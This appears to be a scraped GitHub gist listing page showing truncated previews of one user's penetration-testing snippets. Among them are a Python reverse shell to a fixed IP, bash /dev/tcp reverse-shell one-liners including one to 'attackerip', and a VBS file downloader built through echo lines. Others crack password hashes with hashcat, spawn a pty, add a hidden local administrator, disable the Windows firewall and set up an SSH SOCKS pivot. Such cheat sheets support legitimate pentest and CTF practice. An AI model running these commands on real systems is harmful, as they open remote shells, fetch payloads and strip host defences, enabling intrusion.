Ryan Bentz sckalath
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
| echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
| echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs | |
| echo Err.Clear >> wget.vbs | |
| echo Set http = Nothing >> wget.vbs | |
| echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # imports here | |
| # Copyright 2012 TrustedSec, LLC. All rights reserved. | |
| # | |
| # This piece of software code is licensed under the FreeBSD license.. | |
| # | |
| # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. | |
| import socket,subprocess | |
| HOST = '192.168.12.45' # The remote host | |
| PORT = 443 # The same port as used by the server |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist | |
| hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #get a pty through python | |
| python -c 'import pty; pty.spawn("/bin/bash");' | |
| #grab the user agent from the http header on port 10443 | |
| tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
| #base64 decode a string | |
| echo STRINGTODECODE | base64 --decode | |
| #escape jail shell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #add a user | |
| net user ryan mwcb /add | |
| #add user to local administrators | |
| net localgroup administrators /add ryan | |
| #remove firewall | |
| netsh firewall set opmode disable | |
| #enabled remote desktop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##SOCKS Proxy## | |
| #Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
| #Command line: | |
| ssh -D 127.0.0.1:1080 10.0.0.1 | |
| #~/.ssh/config: | |
| Host 10.0.0.1 | |
| DynamicForward 127.0.0.1:1080 | |
| #You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 | |
| 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
| #bash alt 3 |
NewerOlder